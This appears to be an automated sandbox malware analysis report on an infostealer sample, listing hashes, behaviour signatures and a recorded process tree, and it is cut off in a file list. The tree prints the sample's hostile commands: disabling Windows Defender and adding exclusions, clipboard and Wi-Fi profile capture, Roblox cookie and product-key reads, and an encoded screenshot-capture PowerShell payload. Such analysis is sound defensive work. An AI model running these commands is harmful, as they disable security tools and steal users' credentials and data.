Analysis

  • max time kernel
    95s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-11-2024 19:49

General

  • Target

    sharkbotnetc2.exe

  • Size

    6.9MB

  • MD5

    54797b3e8dac7850a1985866ae500b0d

  • SHA1

    faf0cba6cf510d7bf907a3802506c778381d58a9

  • SHA256

    5e745e0b505d56d135db62d1fb40168905eb7492b75eaa58a8fcea7f9f6e602b

  • SHA512

    787741afee2c9795ac05ce35862aa37a656cfd96edee4324997fbd62cc143559dded94cd08732ce981938dcf3375d77754cd3efb45f719fadec6a9338fdf6ae2

  • SSDEEP

    196608:4aV1FiHB6ylnlPzf+JiJCsmFMvcn6hVvv:AHBRlnlPSa7mmvc+H

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sharkbotnetc2.exe
    "C:\Users\Admin\AppData\Local\Temp\sharkbotnetc2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Users\Admin\AppData\Local\Temp\sharkbotnetc2.exe
      "C:\Users\Admin\AppData\Local\Temp\sharkbotnetc2.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4740
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sharkbotnetc2.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sharkbotnetc2.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2964
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4760
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1220
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‌​ ​.scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4260
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‌​ ​.scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2524
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2432
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1604
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2504
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3168
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4292
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3644
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
          4⤵
            PID:768
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4736
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:736
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:656
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:3360
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4964
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:1400
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3480
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3740
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\43bqhmp4\43bqhmp4.cmdline"
                5⤵
                  PID:768
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB892.tmp" "c:\Users\Admin\AppData\Local\Temp\43bqhmp4\CSCB72C1DA71A7845CBB5B2FA9797F854F2.TMP"
                    6⤵
                      PID:5100
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "systeminfo"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3260
                • C:\Windows\system32\systeminfo.exe
                  systeminfo
                  4⤵
                  • Gathers system information
                  PID:2156
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4504
                • C:\Windows\system32\attrib.exe
                  attrib -r C:\Windows\System32\drivers\etc\hosts
                  4⤵
                  • Drops file in Drivers directory
                  • Views/modifies file attributes
                  PID:964
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2412
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4668
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                    PID:4676
                    • C:\Windows\system32\attrib.exe
                      attrib +r C:\Windows\System32\drivers\etc\hosts
                      4⤵
                      • Drops file in Drivers directory
                      • Views/modifies file attributes
                      PID:4644
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:4476
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:2372
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:208
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:752
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            3⤵
                              PID:3732
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                4⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1476
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:4560
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:3724
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:4620
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3960
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:4676
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:796
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:3560
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4156
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "getmac"
                                          3⤵
                                            PID:1676
                                            • C:\Windows\system32\getmac.exe
                                              getmac
                                              4⤵
                                                PID:4620
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI25202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\dLfoa.zip" *"
                                              3⤵
                                                PID:3428
                                                • C:\Users\Admin\AppData\Local\Temp\_MEI25202\rar.exe
                                                  C:\Users\Admin\AppData\Local\Temp\_MEI25202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\dLfoa.zip" *
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:3836
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                3⤵
                                                  PID:1956
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic os get Caption
                                                    4⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1616
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                  3⤵
                                                    PID:2692
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic computersystem get totalphysicalmemory
                                                      4⤵
                                                        PID:3156
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      3⤵
                                                        PID:2112
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic csproduct get uuid
                                                          4⤵
                                                            PID:3716
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                          3⤵
                                                            PID:4784
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3192
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            3⤵
                                                              PID:2032
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic path win32_VideoController get name
                                                                4⤵
                                                                • Detects videocard installed
                                                                PID:4008
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                              3⤵
                                                                PID:5100
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:1976

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            8740e7db6a0d290c198447b1f16d5281

                                                            SHA1

